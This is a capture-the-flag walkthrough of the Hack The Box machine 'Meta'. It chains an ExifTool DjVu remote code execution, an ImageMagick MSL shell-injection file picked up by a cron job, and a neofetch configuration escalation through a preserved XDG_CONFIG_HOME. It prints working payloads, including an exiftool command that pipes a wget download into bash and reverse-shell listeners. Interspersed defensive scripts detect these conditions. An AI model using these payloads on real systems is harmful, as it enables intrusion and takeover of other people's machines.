
Hack The Box - Meta

✍️ sckull

After enumerating subdomains we find MetaView, which uses a vulnerable version of ExifTool through which we gain access to the machine. After discovering a cronjob that runs a vulnerable version of ImageMagick we gain access to a second user. Finally we escalate privileges by modifying the user configuration variable that neofetch reads.

Name: Meta
OS: Linux
Points: 30
Difficulty: Medium
IP: 10.10.11.140
Maker: Nauten

Matrix (Enumeration, Real-Life, CVE, Custom Exploitation, CTF-Like)

User Rate: 5.9, 5, 5.5, 4.5, 5
Maker Rate: 7, 7, 8, 2, 3

Recon

nmap

nmap shows two open ports: http (80) and ssh (22).

# Nmap 7.91 scan initiated Sat Jan 22 23:50:19 2022 as: nmap -sS -sV -sC -Pn -p- --min-rate 3000 -oN nmap_scan 10.129.99.144
Warning: 10.129.99.144 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.99.144 (10.129.99.144)
Host is up (0.081s latency).
Not shown: 59823 closed ports, 5710 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 12:81:17:5a:5a:c9:c6:00:db:f0:ed:93:64:fd:1e:08 (RSA)
|   256 b5:e5:59:53:00:18:96:a6:f8:42:d8:c7:fb:13:20:49 (ECDSA)
|_  256 05:e9:df:71:b5:9f:25:03:6b:d0:46:8d:05:45:44:20 (ED25519)
80/tcp open  http    Apache httpd
|_http-server-header: Apache
|_http-title: Did not follow redirect to http://artcorp.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 22 23:52:07 2022 -- 1 IP address (1 host up) scanned in 108.65 seconds

Web Site

The website redirects us to a domain: artcorp.htb.

 π ~/htb/meta ❯ curl -sI 10.129.99.144
HTTP/1.1 301 Moved Permanently
Date: Sat, 22 Jan 2022 23:52:10 GMT
Server: Apache
Location: http://artcorp.htb
Content-Type: text/html; charset=UTF-8

 π ~/htb/meta ❯

The website does not show much information.

Directory Brute Forcing

feroxbuster lists the website's resources.

 π ~/htb/meta ❯ feroxbuster -u http://artcorp.htb/ -w $MD -x php,html,txt --depth 1

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.3.3
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://artcorp.htb/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 👌  Status Codes          │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.3.3
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 💲  Extensions            │ [php, html, txt]
 🔃  Recursion Depth       │ 1
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
200       86l      263w     4427c http://artcorp.htb/index.html
301        7l       20w      234c http://artcorp.htb/assets
301        7l       20w      231c http://artcorp.htb/css
403        7l       20w      199c http://artcorp.htb/server-status

Subdomains

We run ffuf to enumerate subdomains and discover dev01.

π ~/htb/meta ❯ ffuf -w bitquark-subdomains-top100000.txt -H "Host: FUZZ.artcorp.htb" -u http://artcorp.htb -fl 1

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://artcorp.htb
 :: Wordlist         : FUZZ: bitquark-subdomains-top100000.txt
 :: Header           : Host: FUZZ.artcorp.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response lines: 1
________________________________________________

dev01                   [Status: 200, Size: 247, Words: 16, Lines: 10]
:: Progress: [100000/100000] :: Job [1/1] :: 209 req/sec :: Duration: [0:09:27] :: Errors: 0 ::
 π ~/htb/meta ❯

Meta - Exiftool

The website shows an application in development.

It lists one address.

<!DOCTYPE html>
<html>
<body>
<h2>ArtCorp dev environment</h2>
<p>Currently applications in development:</p>
<p><a href="http://dev01.artcorp.htb/metaview/">MetaView</a></p>
<p>* Only applications ready to be tested are listed</p>
</body>
</html>

The new address shows a form for uploading files.

It only accepts jpg/png files.

File not allowed (only jpg/png).

After uploading a .png image we see the image's metadata, which looks like exiftool output.

Running exiftool locally on the image shows similar information.

 π ~/htb/meta ❯ exiftool 5bat.png
ExifTool Version Number         : 12.30
File Name                       : 5bat.png
Directory                       : .
File Size                       : 187 KiB
File Modification Date/Time     : 2016:10:22 12:28:12+00:00
File Access Date/Time           : 2022:02:02 00:19:44+00:00
File Inode Change Date/Time     : 2022:01:23 00:55:00+00:00
File Permissions                : -rw-r--r--
File Type                       : PNG
File Type Extension             : png
MIME Type                       : image/png
Image Width                     : 700
Image Height                    : 728
Bit Depth                       : 8
Color Type                      : Palette
Compression                     : Deflate/Inflate
Filter                          : Adaptive
Interlace                       : Noninterlaced
Gamma                           : 2.2
SRGB Rendering                  : Perceptual
Palette                         : (Binary data 768 bytes, use -b option to extract)
Transparency                    : (Binary data 36 bytes, use -b option to extract)
Image Size                      : 700x728
Megapixels                      : 0.510
 π ~/htb/meta ❯ exiftool -ver
12.30

User - www-data

Researching exiftool, we find a post on HackerOne explaining that command execution is possible because of a bug in the DjVu module. We also find a repository containing a configuration file for executing commands.

Exiftool RCE

To exploit it we git clone the exiftool repository and use one of the commits between versions 7.44 and 12.23.

With that we can run exiftool with the configuration file (eval.config), passing it a command, in this case a ping to our machine.

 π exiftool 416433281bff7e021e04acd9d1f15634c9a66964 ✗ ❯ ./exiftool -config ../JPEG_RCE/eval.config ../JPEG_RCE/runme.jpg -eval='system("ping -c 3 10.10.14.198")'
    1 image files updated
 π exiftool 416433281bff7e021e04acd9d1f15634c9a66964 ✗ ❯ ls ../JPEG_RCE/
eval.config  POC.mp4  README.md  runme.jpg  runme.jpg_original
 π exiftool 416433281bff7e021e04acd9d1f15634c9a66964 ✗ ❯

After uploading the image we see that the command was executed.

We received requests on our machine.

 π ~/htb/meta ❯ sudo tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
00:44:31.504565 IP artcorp.htb > 10.10.14.198: ICMP echo request, id 17794, seq 1, length 64
00:44:31.504604 IP 10.10.14.198 > artcorp.htb: ICMP echo reply, id 17794, seq 1, length 64
00:44:32.505642 IP artcorp.htb > 10.10.14.198: ICMP echo request, id 17794, seq 2, length 64
00:44:32.505659 IP 10.10.14.198 > artcorp.htb: ICMP echo reply, id 17794, seq 2, length 64
00:44:33.507040 IP artcorp.htb > 10.10.14.198: ICMP echo request, id 17794, seq 3, length 64
00:44:33.507056 IP 10.10.14.198 > artcorp.htb: ICMP echo reply, id 17794, seq 3, length 64

Shell

We run shells and create a new image that executes a reverse shell.

 π exiftool 416433281bff7e021e04acd9d1f15634c9a66964 ✗ ❯ ./exiftool -config ../JPEG_RCE/eval.config ../JPEG_RCE/runme.jpg -eval='system("wget -qO- 10.10.14.198/10.10.14.198:1338|bash")'
    1 image files updated
 π exiftool 416433281bff7e021e04acd9d1f15634c9a66964 ✗ ❯

With that we obtain a shell as www-data.

 π ~/htb/meta ❯ rlwrap nc -lvp 1338
listening on [any] 1338 ...
connect to [10.10.14.198] from artcorp.htb [10.10.11.140] 33682
/bin/sh: 0: can't access tty; job control turned off
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash");'
www-data@meta:/var/www/dev01.artcorp.htb/metaview$ whoami;id;pwd
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/var/www/dev01.artcorp.htb/metaview
www-data@meta:/var/www/dev01.artcorp.htb/metaview$

We look at the page's source code, in particular the function that runs exiftool on the image.

<?php
require 'vendor/autoload.php';

function upload() {
    $output = "";
    if (isset($_FILES["imageUpload"])) {
        $filepath = $_FILES['imageUpload']['tmp_name'];
        $fileSize = filesize($filepath);
        $fileinfo = finfo_open(FILEINFO_MIME_TYPE);
        $filetype = finfo_file($fileinfo, $filepath);

        if ($fileSize === 0 || $fileSize === false) {
            return "The file is empty.";
        }

        if ($fileSize > 2097152) {
            return "The file is too large (max 2MB)";
        }

        $allowedTypes = [
           'image/png' => 'png',
           'image/jpeg' => 'jpg'
        ];

        if (!in_array($filetype, array_keys($allowedTypes))) {
            return "File not allowed (only jpg/png).";
        }

        $filename = basename($filepath);
        $extension = $allowedTypes[$filetype];
        $targetDirectory = __DIR__ . "/uploads";

        $newFilepath = $targetDirectory . "/" . $filename . "." . $extension;

        if (!move_uploaded_file($filepath, $newFilepath)) {
            return "Error during upload.";
        }

        return exiftool_exec($newFilepath);
    }
}

$output = upload();
?>

<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="utf-8" />
        <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
        <meta name="description" content="" />
        <meta name="author" content="" />
        <title>MetaView</title>
        <link href="css/bootstrap.min.css" rel="stylesheet" />
        <link href="css/styles.css" rel="stylesheet" />
    </head>

    <body>
        <div id="main_container" class="container h-100 d-flex">
            <div class="jumbotron my-auto">
                <h2>MetaView</h2>
                <p>Upload your image to display related metadata.</p>
                <form action="index.php" method="post" enctype="multipart/form-data">
                    <div class="input-group">
                        <div class="custom-file">
                            <input type="file" name="imageUpload" id="imageUpload" class="custom-file-input"onchange="this.nextElementSibling.innerText = this.files[0].name">
                            <label class="custom-file-label" for="imageUpload">Choose file..</label>
                        </div>
                        <div class="input-group-append">
                            <button type="submit" name="submit" class="btn btn-primary">Upload</button>
                        </div>
                    </div>
                </form>
                <?php if(!empty($output)): ?>
                <div class="mt-3" id="output_data">
                    <pre><?php echo $output; ?></pre>
                </div>
                <?php endif; ?>
            </div>
        </div>
    </body>
</html>
// lib/ExifToolWrapper.php
<?php
    function exiftool_exec($newFilepath) {
        return shell_exec("exiftool " . escapeshellarg($newFilepath) . " --system:all --exiftool:all -e");
    }
?>
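A defender-side complement to the wrapper above, written as an added example (not code from the writeup or from MetaView): it classifies `exiftool -ver` output against the 7.44 to 12.23 range the writeup names, and sweeps an uploaded blob for the DjVu container signature AT&TFORM, which has no place in a file that passed the jpg/png MIME check. The sample bytes are constructed and the function names are mine.

```python
"""Defender-side checks for the MetaView upload path: ExifTool version
against the range the writeup names, and a signature sweep of uploaded
bytes.  Added example, not code from the writeup or from MetaView; the
sample bytes are constructed and the function names are mine."""
import re
import shutil
import subprocess

VULN_MIN = (7, 44)   # inclusive bounds of the affected ExifTool releases,
VULN_MAX = (12, 23)  # as stated in the writeup

# Leading bytes of the two formats the upload form accepts.
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
}
# A DjVu document is an IFF container that starts with this signature.
# Finding it inside a blob that passed the jpg/png MIME check means the
# file carries data for ExifTool's DjVu parser, which the form never needs.
DJVU_SIG = b"AT&TFORM"


def parse_version(text):
    """Turn text such as '12.30' (what `exiftool -ver` prints) into (major, minor)."""
    m = re.search(r"(\d+)\.(\d+)", text)
    return (int(m.group(1)), int(m.group(2))) if m else None


def assess(ver_output):
    """Classify `exiftool -ver` output: 'vulnerable', 'not affected' or 'unknown'."""
    v = parse_version(ver_output)
    if v is None:
        return "unknown"
    return "vulnerable" if VULN_MIN <= v <= VULN_MAX else "not affected"


def audit_local_exiftool():
    """Run the real binary if one is on PATH; otherwise report it missing."""
    path = shutil.which("exiftool")
    if path is None:
        return "not installed"
    proc = subprocess.run([path, "-ver"], capture_output=True, text=True, check=False)
    return assess(proc.stdout)


def scan_upload(data, claimed):
    """Findings for an uploaded blob the MIME check labelled `claimed`
    ('png' or 'jpg'); an empty list means nothing suspicious."""
    findings = []
    magic = MAGIC.get(claimed)
    if magic is None:
        findings.append(f"unsupported claimed type {claimed!r}")
    elif not data.startswith(magic):
        findings.append(f"magic bytes do not match claimed type {claimed}")
    if DJVU_SIG in data:
        findings.append("embedded DjVu container (AT&TFORM)")
    return findings


# Constructed samples: a minimal PNG prefix, and the same prefix with a
# DjVu container signature buried after the image data.
CLEAN_PNG = MAGIC["png"] + b"\x00\x00\x00\x0dIHDR" + b"\x00" * 17
TAINTED_PNG = CLEAN_PNG + b"\x00" * 32 + DJVU_SIG + b"\x00\x00\x00\x10DJVU"

if __name__ == "__main__":
    for sample in ("12.30", "12.16", "7.43"):
        print(f"exiftool {sample}: {assess(sample)}")
    print("local exiftool:", audit_local_exiftool())
    print("clean upload:", scan_upload(CLEAN_PNG, "png"))
    print("tainted upload:", scan_upload(TAINTED_PNG, "png"))
```

The signature sweep is a heuristic, not a parser: it catches the container header wherever it sits in the blob, which is what matters when the wrapper hands the whole file to exiftool regardless of what the MIME sniff said about its first bytes.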

User - Thomas

We see the user thomas in /home; after enumerating we find nothing that would give us access to this user. We run pspy and discover that this user has a cronjob that runs the script convert_images.sh.

2022/02/01 20:01:01 CMD: UID=0    PID=19551  | /usr/sbin/CRON -f
2022/02/01 20:01:01 CMD: UID=0    PID=19550  | /usr/sbin/CRON -f
2022/02/01 20:01:01 CMD: UID=1000 PID=19552  | /bin/sh -c /usr/local/bin/convert_images.sh
2022/02/01 20:01:01 CMD: UID=1000 PID=19553  | /bin/bash /usr/local/bin/convert_images.sh
2022/02/01 20:01:01 CMD: UID=1000 PID=19554  | /usr/local/bin/mogrify -format png *.*
2022/02/01 20:01:01 CMD: UID=0    PID=19555  | /usr/sbin/CRON -f
2022/02/01 20:01:01 CMD: UID=0    PID=19556  | /bin/sh -c rm /tmp/*
2022/02/01 20:01:01 CMD: UID=1000 PID=19557  | /bin/bash /usr/local/bin/convert_images.sh

The script runs mogrify on every file in the directory /var/www/dev01.artcorp.htb/convert_images/, converting them to .png format.

www-data@meta:/$ cat /usr/local/bin/convert_images.sh
#!/bin/bash
cd /var/www/dev01.artcorp.htb/convert_images/ && /usr/local/bin/mogrify -format png *.* 2>/dev/null
pkill mogrify
www-data@meta:/$

Checking this command, it is ImageMagick version 7.0.10-36.

www-data@meta:/home/thomas$ which mogrify
/usr/local/bin/mogrify
www-data@meta:/home/thomas$ ls -lah /usr/local/bin/mogrify
lrwxrwxrwx 1 root root 6 Aug 29 15:59 /usr/local/bin/mogrify -> magick
www-data@meta:/home/thomas$ magick -version
Version: ImageMagick 7.0.10-36 Q16 x86_64 2021-08-29 https://imagemagick.org
Copyright: © 1999-2020 ImageMagick Studio LLC
License: https://imagemagick.org/script/license.php
Features: Cipher DPC HDRI OpenMP(4.5)
Delegates (built-in): fontconfig freetype jng jpeg png x xml zlib
www-data@meta:/home/thomas$

searchsploit shows multiple vulnerabilities for the closest version.

 π ~/htb/meta ❯ searchsploit ImageMagick
--------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                   |  Path
--------------------------------------------------------------------------------- ---------------------------------
GeekLog 2.x - 'ImageImageMagick.php' Remote File Inclusion                       | php/webapps/3946.txt
ImageMagick - Memory Leak                                                        | multiple/local/45890.sh
ImageMagick 6.8.8-4 - Local Buffer Overflow (SEH)                                | windows/local/31688.pl
ImageMagick 6.9.3-9 / 7.0.1-0 - 'ImageTragick' Delegate Arbitrary Command Execut | multiple/local/39791.rb
ImageMagick 6.x - '.PNM' Image Decoding Remote Buffer Overflow                   | linux/dos/25527.txt
ImageMagick 6.x - '.SGI' Image File Remote Heap Buffer Overflow                  | linux/dos/28383.txt
ImageMagick 7.0.1-0 / 6.9.3-9 - 'ImageTragick ' Multiple Vulnerabilities         | multiple/dos/39767.txt
--------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
 π ~/htb/meta ❯

ImageMagick - Shell Injection

We also find a post, ImageMagick - Shell injection via PDF password, which shows a PoC SVG image that allows command execution.

<image authenticate='ff" `echo $(id)> ./0wned`;"'>
  <read filename="pdf:/etc/passwd"/>
  <get width="base-width" height="base-height" />
  <resize geometry="400x400" />
  <write filename="test.png" />
  <svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">       
  <image xlink:href="msl:poc.svg" height="100" width="100"/>
  </svg>
</image>

We modify the PoC to ping our machine.

<image authenticate='ff" `ping -c 3 10.10.14.198`;"'>
  <read filename="pdf:/etc/passwd"/>
  <get width="base-width" height="base-height" />
  <resize geometry="400x400" />
  <write filename="/dev/shm/test.png" />
  <svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <image xlink:href="msl:image.svg" height="100" width="100"/>
  </svg>
</image>

After a few seconds we receive multiple pings.

 π ~/htb/meta/www ❯ sudo tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
01:19:04.448940 IP artcorp.htb > 10.10.14.198: ICMP echo request, id 19840, seq 1, length 64
01:19:04.448981 IP 10.10.14.198 > artcorp.htb: ICMP echo reply, id 19840, seq 1, length 64
01:19:05.450592 IP artcorp.htb > 10.10.14.198: ICMP echo request, id 19840, seq 2, length 64
01:19:05.450622 IP 10.10.14.198 > artcorp.htb: ICMP echo reply, id 19840, seq 2, length 64
01:19:06.451784 IP artcorp.htb > 10.10.14.198: ICMP echo request, id 19840, seq 3, length 64
01:19:06.451819 IP 10.10.14.198 > artcorp.htb: ICMP echo reply, id 19840, seq 3, length 64
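Detection logic for the MSL payload shape shown in this section, written as an added example (not part of the writeup or of ImageMagick): it parses each file in a directory such as convert_images regardless of extension, since the cron's `*.*` glob ignores it too, and flags an `authenticate` attribute carrying shell metacharacters or any reference to the msl:/pdf: coders. The malicious sample is the writeup's own PoC; the benign SVG, the coder list and the function names are mine.

```python
"""Flag MSL/SVG payloads of the shape shown above before a cron-driven
ImageMagick run picks them up.  Added example, not part of the writeup or
of ImageMagick; the coder list, function names and benign sample are mine,
the malicious sample is the writeup's PoC."""
import re
import xml.etree.ElementTree as ET
from pathlib import Path

XLINK_HREF = "{http://www.w3.org/1999/xlink}href"
# Shell metacharacters that have no place in an `authenticate` (password) value.
SHELL_META = re.compile(r'[`$;|&"]')
# Coders a file found in an upload directory should never be able to invoke.
RISKY_CODERS = ("msl:", "pdf:", "ps:", "ephemeral:")


def scan_xml(text):
    """Return findings for one XML/SVG document (empty list = nothing flagged).
    Documents that are not well-formed get a plain text sweep instead."""
    findings = []
    try:
        root = ET.fromstring(text)
    except ET.ParseError:
        if "authenticate" in text and SHELL_META.search(text):
            findings.append("malformed XML: authenticate with shell metacharacters")
        for coder in RISKY_CODERS:
            if coder in text.lower():
                findings.append(f"malformed XML references the {coder} coder")
        return findings

    for el in root.iter():
        tag = el.tag.split("}")[-1]  # strip any namespace
        auth = el.get("authenticate")
        if auth is not None and SHELL_META.search(auth):
            findings.append(f"<{tag}> authenticate value contains shell metacharacters")
        for attr in ("filename", "href", XLINK_HREF):
            value = (el.get(attr) or "").lower()
            for coder in RISKY_CODERS:
                if value.startswith(coder):
                    findings.append(f"<{tag}> references the {coder} coder")
    return findings


def scan_directory(path):
    """Scan every regular file directly under `path` whose content looks like
    XML, whatever its extension: the cron's `*.*` glob does not care either.
    Returns {filename: findings} for files with at least one finding."""
    report = {}
    for f in sorted(Path(path).iterdir()):
        if f.is_file():
            text = f.read_text(errors="ignore")
            if text.lstrip().startswith("<"):
                hits = scan_xml(text)
                if hits:
                    report[f.name] = hits
    return report


# The writeup's PoC (malicious) and a constructed benign SVG.
POC_MSL = """<image authenticate='ff" `echo $(id)> ./0wned`;"'>
  <read filename="pdf:/etc/passwd"/>
  <get width="base-width" height="base-height" />
  <resize geometry="400x400" />
  <write filename="test.png" />
  <svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <image xlink:href="msl:poc.svg" height="100" width="100"/>
  </svg>
</image>"""
BENIGN_SVG = """<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">
  <rect width="10" height="10" fill="red"/>
</svg>"""

if __name__ == "__main__":
    print("poc:", scan_xml(POC_MSL))
    print("benign:", scan_xml(BENIGN_SVG))
```

Scanning is a second line of defence; the first is ImageMagick's own policy.xml, where a line such as `<policy domain="coder" rights="none" pattern="MSL" />` (and the same for PDF and PS) stops those coders from being reached at all, whatever a dropped file contains.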

Shell

We add a reverse shell, obtaining access as thomas and the user.txt flag.

 π ~/htb/meta ❯ rlwrap nc -lvp 1335
listening on [any] 1335 ...
connect to [10.10.14.198] from artcorp.htb [10.10.11.140] 42070
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash");'
thomas@meta:/var/www/dev01.artcorp.htb/convert_images$ whoami;id
thomas
uid=1000(thomas) gid=1000(thomas) groups=1000(thomas)
thomas@meta:/var/www/dev01.artcorp.htb/convert_images$ cd
thomas@meta:~$ ls
user.txt
thomas@meta:~$ cat user.txt
90e4234367d020079151cbd9270efca0
thomas@meta:~$

Privesc

We use thomas's SSH private key to get a more comfortable shell.

 π ~/htb/meta ❯ nano key_thomas
 π ~/htb/meta ❯ chmod 600 key_thomas
 π ~/htb/meta ❯ ssh thomas@10.10.11.140 -i key_thomas
Linux meta 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
thomas@meta:~$

We see that thomas can run the neofetch command as root.

thomas@meta:~$ sudo -l -l
Matching Defaults entries for thomas on meta:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, env_keep+=XDG_CONFIG_HOME

User thomas may run the following commands on meta:

Sudoers entry:
    RunAsUsers: root
    Options: !authenticate
    Commands:
    /usr/bin/neofetch \"\"
thomas@meta:~$

Running it shows information about the machine.

thomas@meta:~$ sudo /usr/bin/neofetch
       _,met$$$$$gg.          root@meta
    ,g$$$$$$$$$$$$$$$P.       ---------
  ,g$$P"     """Y$$.".        OS: Debian GNU/Linux 10 (buster) x86_64
 ,$$P'              `$$$.     Host: VMware Virtual Platform None
',$$P       ,ggs.     `$$b:   Kernel: 4.19.0-17-amd64
`d$$'     ,$P"'   .    $$$    Uptime: 7 hours, 9 mins
 $$P      d$'     ,    $$P    Packages: 495 (dpkg)
 $$:      $$.   -    ,d$$'    Shell: bash 5.0.3
 $$;      Y$b._   _,d$P'      CPU: Intel Xeon Gold 5218 (2) @ 2.294GHz
 Y$$.    `.`"Y$$$$P"'         GPU: VMware SVGA II Adapter
 `$$b      "-.__              Memory: 180MiB / 1994MiB
  `Y$$
   `Y$$.
     `$$b.
       `Y$$b.
          `"Y$b._
              `"""

thomas@meta:~$

Looking closer, the XDG_CONFIG_HOME variable is configured in sudoers; it appears in the sudo -l -l output as env_keep+=XDG_CONFIG_HOME, so we could modify it. neofetch uses the configuration file found under $HOME/.config of the user that runs it.

When run with sudo it uses the configuration file in /root/.config; if we modify the XDG_CONFIG_HOME variable we could point it at thomas's local configuration instead.
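A defender-side audit of that sudo output, written as an added example (not part of the writeup): it parses `sudo -l -l` text for env_keep variables that let the caller redirect where a root-run program loads configuration or code from, and for rules that carry !authenticate or NOPASSWD. The embedded sample is the writeup's own sudo output; the watch-list, the function names and the NOPASSWD handling are assumptions of this example.

```python
"""Audit `sudo -l -l` output for preserved environment variables that let
the caller steer a root-run program, and for rules that need no password.
Added example, not from the writeup; the sample text is the writeup's own
sudo output, the watch-list and function names are mine."""
import re

# Variables through which the invoking user can choose where a privileged
# program loads configuration or code from.  Watch-list is an assumption of
# this example, not an exhaustive set.
RISKY_ENV = {
    "XDG_CONFIG_HOME": "config lookup for XDG-aware tools such as neofetch",
    "HOME": "dotfile lookup for the root-run program",
    "PATH": "command resolution (only matters without secure_path)",
    "PYTHONPATH": "module hijack for Python programs",
    "PERL5LIB": "module hijack for Perl programs",
    "BASH_ENV": "file sourced by non-interactive bash",
    "ENV": "file sourced by sh",
    "LD_LIBRARY_PATH": "shared-object search path",
}

ENV_KEEP_RE = re.compile(r'env_keep\s*\+?=\s*(?:"([^"]*)"|([^\s,]+))')


def parsed_env_keep(text):
    """Collect every variable named in env_keep / env_keep+= entries."""
    names = set()
    for quoted, bare in ENV_KEEP_RE.findall(text):
        for name in re.split(r"[\s,]+", (quoted or bare).strip()):
            if name:
                names.add(name)
    return names


def has_secure_path(text):
    """True when a secure_path default is in force."""
    return re.search(r"\bsecure_path\s*=", text) is not None


def nopasswd_commands(text):
    """Commands runnable without authentication, in both the short
    `sudo -l` layout (NOPASSWD:) and the long `sudo -l -l` layout."""
    cmds = []
    noauth = in_cmds = False
    for line in text.splitlines():
        s = line.strip()
        if "NOPASSWD:" in s:
            cmds.append(s.split("NOPASSWD:", 1)[1].strip())
        elif s.startswith("Sudoers entry"):
            noauth = in_cmds = False
        elif s.startswith("Options:"):
            noauth = "!authenticate" in s
        elif s.startswith("Commands:"):
            in_cmds = True
        elif in_cmds and noauth and s:
            cmds.append(s)
    return cmds


def audit(text):
    """Human-readable findings for one `sudo -l` / `sudo -l -l` dump."""
    findings = []
    secure = has_secure_path(text)
    for name in sorted(parsed_env_keep(text)):
        if name == "PATH" and secure:
            continue  # secure_path overrides a preserved PATH
        if name in RISKY_ENV:
            findings.append(f"env_keep preserves {name}: {RISKY_ENV[name]}")
    for cmd in nopasswd_commands(text):
        findings.append(f"runs without authentication: {cmd}")
    return findings


# Sample: the writeup's own `sudo -l -l` output for thomas.
SAMPLE_SUDO_L = """Matching Defaults entries for thomas on meta:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin, env_keep+=XDG_CONFIG_HOME

User thomas may run the following commands on meta:

Sudoers entry:
    RunAsUsers: root
    Options: !authenticate
    Commands:
    /usr/bin/neofetch \\"\\"
"""

if __name__ == "__main__":
    for finding in audit(SAMPLE_SUDO_L):
        print("-", finding)
```

On this box the audit reports both halves of the problem at once: a preserved XDG_CONFIG_HOME, and a root-run neofetch that needs no password, which together are exactly what the next steps rely on. The fix is to drop XDG_CONFIG_HOME from env_keep (env_reset alone then discards it) rather than to patch neofetch.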

We modify neofetch's configuration file.

thomas@meta:~$ head .config/neofetch/config.conf
# See this wiki page for more info:
# https://github.com/dylanaraps/neofetch/wiki/Customizing-Info
print_info() {
    prin "$(whoami;id)"
    info title
    info underline

    info "OS" distro
    info "Host" model
    info "Kernel" kernel
thomas@meta:~$

We set the XDG_CONFIG_HOME variable and run neofetch with sudo; the output of our command appears at the top.

thomas@meta:~$ XDG_CONFIG_HOME=/home/thomas/.config sudo /usr/bin/neofetch
       _,met$$$$$gg.          root uid=0(root) gid=0(root) groups=0(root)
    ,g$$$$$$$$$$$$$$$P.       root@meta
  ,g$$P"     """Y$$.".        ---------
 ,$$P'              `$$$.     OS: Debian GNU/Linux 10 (buster) x86_64
',$$P       ,ggs.     `$$b:   Host: VMware Virtual Platform None
`d$$'     ,$P"'   .    $$$    Kernel: 4.19.0-17-amd64
 $$P      d$'     ,    $$P    Uptime: 7 hours, 20 mins
 $$:      $$.   -    ,d$$'    Packages: 495 (dpkg)
 $$;      Y$b._   _,d$P'      Shell: bash 5.0.3
 Y$$.    `.`"Y$$$$P"'         CPU: Intel Xeon Gold 5218 (2) @ 2.294GHz
 `$$b      "-.__              GPU: VMware SVGA II Adapter
  `Y$$                        Memory: 182MiB / 1994MiB
   `Y$$.
     `$$b.
       `Y$$b.
          `"Y$b._
              `"""

thomas@meta:~$

Finally we add a reverse shell to the configuration file, obtaining access as root and the root.txt flag.

 π ~/htb/meta ❯ rlwrap nc -lvp 1338
listening on [any] 1338 ...
connect to [10.10.14.198] from artcorp.htb [10.10.11.140] 33710
root@meta:/home/thomas# whoami
root
root@meta:/home/thomas# cd /root
root@meta:~# ls
conf
root.txt
root@meta:/home/thomas# cat root.txt
03c068505c7d80bd7c68b4950dbf64a4
root@meta:~#

Written by sckull (Dany Sucuc), RedTeamer & Pentester wannabe